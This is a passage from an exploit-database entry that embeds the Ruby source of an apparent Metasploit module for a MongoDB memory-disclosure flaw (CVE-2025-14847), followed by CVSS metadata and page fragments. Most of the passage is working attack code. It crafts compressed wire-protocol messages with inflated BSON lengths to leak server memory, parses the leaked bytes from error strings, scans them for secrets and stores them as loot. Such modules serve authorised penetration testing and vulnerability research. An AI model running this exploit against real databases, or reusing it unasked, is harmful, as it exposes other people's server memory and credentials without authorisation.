unique_leaks.add(data)\n          all_leaked << data\n          pass_leaks += 1\n\n          # Check for interesting patterns\n          check_secrets(data, doc_len, secrets_found)\n\n          # Report large leaks or all if configured\n          next unless data.length > datastore['LEAK_THRESHOLD'] || datastore['SHOW_ALL_LEAKS']\n\n          preview = data.gsub(/[^[:print:]]/, '.')[0, 80]\n          print_good(\"offset=#{doc_len.to_s.ljust(4)} len=#{data.length.to_s.ljust(4)}: #{preview}\")\n\n          # Show hex dump if enabled\n          if datastore['SHOW_HEX'] && !data.empty?\n            print_hexdump(data)\n          end\n        end\n      rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e\n        vprint_error(\"Connection error at offset #{doc_len}: #{e.message}\")\n        next\n      rescue ::Timeout::Error\n        vprint_error(\"Timeout at offset #{doc_len}\")\n        next\n      end\n\n      # Pass summary\n      if repeat_count > 1\n        print_status(\"Pass #{pass} complete: #{pass_leaks} new leaks (#{unique_leaks.size} total unique)\")\n      end\n    end\n\n    # Overall summary and loot storage\n    if !all_leaked.empty?\n      print_line\n      print_good(\"Total leaked: #{all_leaked.length} bytes\")\n      print_good(\"Unique fragments: #{unique_leaks.size}\")\n\n      # Store leaked data as loot\n      loot_info = 'MongoDB Memory Disclosure (CVE-2025-14847)'\n      loot_info += \" - Version: #{version_info[:version]}\" if version_info&.dig(:version)\n\n      path = store_loot(\n        'mongodb.memory_leak',\n        'application/octet-stream',\n        ip,\n        all_leaked,\n        'mongobleed.bin',\n        loot_info\n      )\n      print_good(\"Leaked data saved to: #{path}\")\n\n      # Report found secrets\n      if secrets_found.any?\n        print_line\n        print_warning('Potential secrets detected:')\n        secrets_found.uniq.each do |secret|\n          print_warning(\"  - #{secret}\")\n        end\n      end\n\n      # Report the vulnerability\n      vuln_info = \"Leaked #{all_leaked.length} bytes of server memory\"\n      vuln_info += \" (MongoDB #{version_info[:version]})\" if version_info&.dig(:version)\n\n      report_vuln(\n        host: ip,\n        port: rport,\n        proto: 'tcp',\n        name: name,\n        refs: references,\n        info: vuln_info\n      )\n    else\n      print_status(\"No data leaked from #{ip}:#{rport}\")\n    end\n  end\n\n  def send_probe(doc_len, buffer_size)\n    # Build minimal BSON content - we lie about total length to trigger the bug\n    # int32 field \"a\" with value 1\n    bson_content = \"\\x10a\\x00\\x01\\x00\\x00\\x00\".b\n\n    # BSON document with inflated length (this is the key to the exploit)\n    bson = [doc_len].pack('V') + bson_content\n\n    # Wrap in OP_MSG structure\n    # flags (4 bytes) + section kind (1 byte) + BSON\n    op_msg = [0].pack('V') + \"\\x00\".b + bson\n\n    # Compress the OP_MSG payload\n    compressed_data = Zlib::Deflate.deflate(op_msg)\n\n    # Build OP_COMPRESSED payload\n    # originalOpcode (4 bytes) + uncompressedSize (4 bytes) + compressorId (1 byte) + compressedData\n    payload = [OP_MSG].pack('V')\n    payload << [buffer_size].pack('V') # Claimed uncompressed size (inflated)\n    payload << [COMPRESSOR_ZLIB].pack('C')\n    payload << compressed_data\n\n    # MongoDB wire protocol header\n    # messageLength (4 bytes) + requestID (4 bytes) + responseTo (4 bytes) + opCode (4 bytes)\n    message_length = 16 + payload.length\n    header = [message_length, 1, 0, OP_COMPRESSED].pack('VVVV')\n\n    # Send and receive with proper cleanup\n    response = nil\n    begin\n      connect\n      sock.put(header + payload)\n      response = recv_mongo_response\n    ensure\n      begin\n        disconnect\n      rescue StandardError\n        nil\n      end\n    end\n\n    response\n  end\n\n  def recv_mongo_response\n    # Read header first (16 bytes minimum)\n    header = sock.get_once(16, 2)\n    return nil if header.nil? || header.length < 4\n\n    msg_len = header.unpack1('V')\n    return header if msg_len <= 16\n\n    # Read remaining data\n    remaining = msg_len - header.length\n    if remaining > 0\n      data = sock.get_once(remaining, 2)\n      return header if data.nil?\n\n      header + data\n    else\n      header\n    end\n  rescue ::Timeout::Error, ::EOFError\n    nil\n  end\n\n  def extract_leaks(response)\n    return [] if response.nil? || response.length < 25\n\n    leaks = []\n\n    begin\n      msg_len = response.unpack1('V')\n      return [] if msg_len > response.length\n\n      # Check if response is compressed (opcode at offset 12)\n      opcode = response[12, 4].unpack1('V')\n\n      if opcode == OP_COMPRESSED\n        # Decompress: skip header (16) + originalOpcode (4) + uncompressedSize (4) + compressorId (1) = 25 bytes\n        raw = Zlib::Inflate.inflate(response[25, msg_len - 25])\n      else\n        # Uncompressed OP_MSG - skip header\n        raw = response[16, msg_len - 16]\n      end\n\n      return [] if raw.nil?\n\n      # Extract field names from BSON parsing errors\n      # These contain memory leaked as \"field names\"\n      raw.scan(/field name '([^']*)'/) do |match|\n        data = match[0]\n        # Filter out known legitimate field names\n        next if data.nil? || data.empty?\n        next if ['?', 'a', '$db', 'ping', 'ok', 'errmsg', 'code', 'codeName'].include?(data)\n\n        leaks << data\n      end\n\n      # Extract type bytes from unrecognized BSON type errors\n      raw.scan(/(?:unrecognized|unknown|invalid)\\s+(?:BSON\\s+)?type[:\\s]+(\\d+)/i) do |match|\n        type_byte = match[0].to_i & 0xFF\n        leaks << type_byte.chr if type_byte > 0\n      end\n    rescue Zlib::Error => e\n      vprint_error(\"Decompression error: #{e.message}\")\n    rescue StandardError => e\n      vprint_error(\"Error extracting leaks: #{e.message}\")\n    end\n\n    leaks\n  end\n\n  def check_secrets(data, offset, secrets_found)\n    pattern = Regexp.new(datastore['SECRETS_PATTERN'], Regexp::IGNORECASE)\n    return unless data =~ pattern\n\n    match = ::Regexp.last_match[0]\n    match_pos = ::Regexp.last_match.begin(0)\n\n    # Extract context around the match (20 chars before and after)\n    context_start = [match_pos - 20, 0].max\n    context_end = [match_pos + match.length + 20, data.length].min\n    context = data[context_start...context_end].gsub(/[^[:print:]]/, '.')\n\n    # Highlight position in context\n    secret_info = \"Pattern '#{match}' at offset #{offset}\"\n    secret_info += \" (pos #{match_pos}): ...#{context}...\"\n\n    secrets_found << secret_info\n    print_warning(\"Secret pattern detected at offset #{offset}: '#{match}' in context: ...#{context}...\")\n  end\n\n  def generate_scan_offsets\n    min_off = datastore['MIN_OFFSET']\n    max_off = datastore['MAX_OFFSET']\n    step = datastore['STEP_SIZE']\n\n    if datastore['QUICK_SCAN']\n      # Quick scan mode: sample key offsets that typically yield results\n      # Based on common BSON document sizes and memory alignment\n      quick_offsets = []\n\n      # Small offsets (header area)\n      quick_offsets += (20..100).step(5).to_a\n\n      # Power of 2 boundaries (common allocation sizes)\n      [128, 256, 512, 1024, 2048, 4096, 8192].each do |boundary|\n        next if boundary < min_off || boundary > max_off\n\n        # Sample around boundaries\n        (-10..10).step(2).each do |delta|\n          off = boundary + delta\n          quick_offsets << off if off >= min_off && off <= max_off\n        end\n      end\n\n      # Sample every 128 bytes for broader coverage\n      quick_offsets += (min_off..max_off).step(128).to_a\n\n      quick_offsets.uniq.sort.select { |o| o >= min_off && o <= max_off }\n    else\n      # Normal scan with step size\n      (min_off..max_off).step(step).to_a\n    end\n  end\n\n  def print_hexdump(data)\n    return if data.nil? || data.empty?\n\n    # Print hexdump in classic format (16 bytes per line)\n    offset = 0\n    data.bytes.each_slice(16) do |chunk|\n      hex_part = chunk.map { |b| '%02x' % b }.join(' ')\n      ascii_part = chunk.map { |b| (b >= 32 && b < 127) ? b.chr : '.' }.join\n\n      # Pad hex part if less than 16 bytes\n      hex_part = hex_part.ljust(47)\n\n      print_line(\"    #{('%04x' % offset)}  #{hex_part}  |#{ascii_part}|\")\n      offset += 16\n\n      # Limit output to avoid flooding console\n      break if offset >= 256\n    end\n    print_line('    ...') if data.length > 256\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.rb",
    "cvss": {
        "score": 8.7,
        "severity": "HIGH",
        "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:N/SI:N/VA:N/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply